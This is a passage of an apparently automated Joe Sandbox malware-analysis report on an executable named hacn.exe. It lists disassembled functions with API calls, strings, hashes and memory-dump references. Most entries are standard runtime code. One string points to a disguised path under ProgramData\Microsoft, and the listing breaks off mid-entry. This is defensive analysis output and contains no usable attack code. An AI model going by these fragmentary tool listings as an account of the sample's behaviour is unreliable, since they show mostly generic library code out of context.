Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction ID: 1769539e03ac3c549bd58630911d162782306b4eb40f94f9e8c948f5d1a63423
Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction Fuzzy Hash: 91F04F61B1E702C1FB20BB24E8457796320AF98BA1F951635CE6E865F4CF2CD4498348

Function 00007FF647799D40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF647799D68
_set_statfp.LIBCMT ref: 00007FF647799D83
_set_statfp.LIBCMT ref: 00007FF647799D9F
_set_statfp.LIBCMT ref: 00007FF647799DDB

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: 7d32a5bc9143e7536d27d3a1dc1be1301e8bb3d51177e842edf1fba4746b298e
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: 191142E6E5EA03C1F6643369E48E37530506FF5360F850634ED6E862EBDE2CA850854C

Function 00007FF64778BA50 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BA6F
FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BA8E
FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAB6
FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAC7
FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAD8

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1e6e5a782a5f01b492f8cacbcb6a8fcb5416b77157f1d6b583dc0ddb18180ab8
Instruction ID: 40207a1ebcffaab786599ddadadfd435edd70612a504d1d0e5fcd137c63f061a
Opcode Fuzzy Hash: 1e6e5a782a5f01b492f8cacbcb6a8fcb5416b77157f1d6b583dc0ddb18180ab8
Instruction Fuzzy Hash: 2B115E20F0C642C1FA59B336E95117A21516F447B0FD64735EC3DCA7E6DE6CF402820A

Function 00007FF64778B8E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF64778B8F5
FlsSetValue.KERNEL32 ref: 00007FF64778B914
FlsSetValue.KERNEL32 ref: 00007FF64778B93C
FlsSetValue.KERNEL32 ref: 00007FF64778B94D
FlsSetValue.KERNEL32 ref: 00007FF64778B95E

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e8ff1f6aa748b16705e4ba19835f5286931d9fc51bca771aec8a92ae03e77792
Instruction ID: 958fcbfe30103cd870da0594eb9c4cdc6ac8086999b6346d39988a84e6cd121e
Opcode Fuzzy Hash: e8ff1f6aa748b16705e4ba19835f5286931d9fc51bca771aec8a92ae03e77792
Instruction Fuzzy Hash: 5B11C960F0D207C1FA687731D85267A11815F45774FDA5B74DD3ECA2F2ED6CB441824A

Function 00007FF6477865B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477865F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778671A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477867D0

Strings

verbose, xrefs: 00007FF6477865C4

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: d1906dbb5167c32503cdba7b4091ee7c4a741bb2887c2f6fd38d7088e1454faf
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: 2891DD22A0CA86D1F721BB25D49077D36A1AB00B98FC64936DE5EC73C6DE3CE8458349

Function 00007FF6477906A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647790987

Part of subcall function 00007FF647796AC4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647796AE1

Strings

ccs, xrefs: 00007FF6477908C2
UTF-8, xrefs: 00007FF647790906
UTF-16LEUNICODE, xrefs: 00007FF647790925

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction ID: 6a4e61f393c9e14ad13fc2853a842f927a8f1b58f75e8d0aeccd77af360ec478
Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction Fuzzy Hash: 7481D0F6E2E603C5FB64BF29811467876A0EB20B48FD58834CE09D7295CF2DE841D789

Function 00007FF64777F0D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF64777F124
_CallSETranslator.LIBVCRUNTIME ref: 00007FF64777F173

Strings

MOC, xrefs: 00007FF64777F138
RCC, xrefs: 00007FF64777F141

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction ID: 7db4f11679b70e364da78d6e0e5d83e315af1188d37d683f53ce5598b9f033ff
Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction Fuzzy Hash: 75616736A08A85CAE720FF65D1803AD77A0FB48B98F444626EE4D97B98CF78E055C704

Function 00007FF64777F434 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64777F45C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF64777F544

Strings

csm, xrefs: 00007FF64777F47E
csm, xrefs: 00007FF64777F596

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction ID: ec5bc5d049d311bac2fd147244c12f9472ea931a08fbccdb8a9c9ad9a99d7ddb
Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction Fuzzy Hash: B7517D32A0C282C6EA64BF25964467877A0EB54B88F948135DE9CC7B95CF3CF5528B08

Function 00007FF647772890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

MessageBoxW.USER32 ref: 00007FF64777299B
MessageBoxA.USER32 ref: 00007FF6477729B7

Strings

%s%s: %s, xrefs: 00007FF647772916
Fatal error detected, xrefs: 00007FF647772971, 00007FF6477729A9

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction ID: 35595f53cfe33a3ca823e743ce29c68beedf20759f45af09ba0f8b43c53a74a4
Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction Fuzzy Hash: 3931F07262C681D1E620FB10E4516EA6365FF94BC4FC04136EA8D96AA9DF3CE605CB44

Function 00007FF647773ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6477739EA), ref: 00007FF647773F01

Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0

Strings

Failed to get executable path., xrefs: 00007FF647773F0B
Failed to convert executable path to UTF-8., xrefs: 00007FF647773F3A
GetModuleFileNameW, xrefs: 00007FF647773F12

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction ID: 69cf025d5ea98c450e67e85df98fa3146e4295cb2a18208eea335ab7e385f7c5
Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction Fuzzy Hash: 2B011AA1B1E686D1FEA0B724E8567B91261EF58BC4FC00031ED4DC6696EE1CF1488608

Function 00007FF64778CC60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF64778CCDF
WriteFile.KERNEL32 ref: 00007FF64778CFA7
WriteFile.KERNEL32 ref: 00007FF64778CFED
GetLastError.KERNEL32 ref: 00007FF64778D0A3

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction ID: 46f42f94cccdeb0775ef2726be8866e87a38792732a0406482b4e0217af0617c
Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction Fuzzy Hash: D0D1F172B1CA81C9E710EF69D4402AC3BB1FB49798B918236CE5DD7B99DE38D40AC314

Function 00007FF647772330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF647772364
SetWindowLongPtrW.USER32 ref: 00007FF647772386
GetWindowLongPtrW.USER32 ref: 00007FF6477723B0
InvalidateRect.USER32 ref: 00007FF6477723D0

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: 710fe90d25957f0fae87ff551d93c03a5938c45e37f3e11f553f18cb3f2552bf
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: 7211A961E0C142C2FA54B769F64427912A1EF95B80FC48130EF6946B9DCD2CE4C14608

Function 00007FF64777C560 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64777C58C
GetCurrentThreadId.KERNEL32 ref: 00007FF64777C59A
GetCurrentProcessId.KERNEL32 ref: 00007FF64777C5A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF64777C5B6

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction ID: b83afb8dfb4bf44af06fc590466f285fd0e5f11eb1980b8c9e7f3e925b64bd02
Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction Fuzzy Hash: 80111C62B19B05C9FB00EB60E8552BD33A4FB59758F840E31DE6D867A4DF78D1988380

Function 00007FF64779638C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647791ED0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647791F03

_get_daylight.LIBCMT ref: 00007FF6477964A4
_get_daylight.LIBCMT ref: 00007FF6477964B5

Strings

?, xrefs: 00007FF647796435

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction ID: 834e940a6cbd39e0fcab81201d1d70fb844fe994c4a75c5ff58c992f31fd6260
Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction Fuzzy Hash: 9B412762A0D292C2FB60BB65E4813795A60EBA07A4F944335EF5CC6AE9DE3CD451C704

Function 00007FF6477896A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477896D6

Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64777C0E5), ref: 00007FF6477896F4

Strings

C:\ProgramData\Microsoft\hacn.exe, xrefs: 00007FF6477896E2

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\ProgramData\Microsoft\hacn.exe
API String ID: 3976345311-1917537409
Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction ID: 44253ca130537d0c298f05cdab63037426ffbeb841be787972e228ada43ea589
Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
Instruction Fuzzy Hash: 86418E76A0CB12CAEB54FF25D4400BD27A4EF84798B964035EE4E83B96DE3DE481C708

Function 00007FF64778D2F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF64778D40F
GetLastError.KERNEL32 ref: 00007FF64778D431

Strings

U, xrefs: 00007FF64778D3BB

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction ID: cd40bbc8b8fbd1d182f1ea6d0689699a2f861ce31bef4e3878baeece9ec8876c
Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
Instruction Fuzzy Hash: 0A41BF62B1DA81C6EB20EF25E4447AA67A0FB98794F854031EE4DC7B98EF3CE441C744

Function 00007FF647772C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

MessageBoxW.USER32 ref: 00007FF647772D25
MessageBoxA.USER32 ref: 00007FF647772D41

Strings

Error detected, xrefs: 00007FF647772CFB, 00007FF647772D33

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction ID: 4b78a3b8c2733af5cbf7631ca0767ca0c64e6046b931f17a86e81d1ef7762ef5
Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
Instruction Fuzzy Hash: 6E21247262CA86D1E620FB10E4916EA6364FF94784FC05136DA4D87A69DF3CE215C744

Function 00007FF647772B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

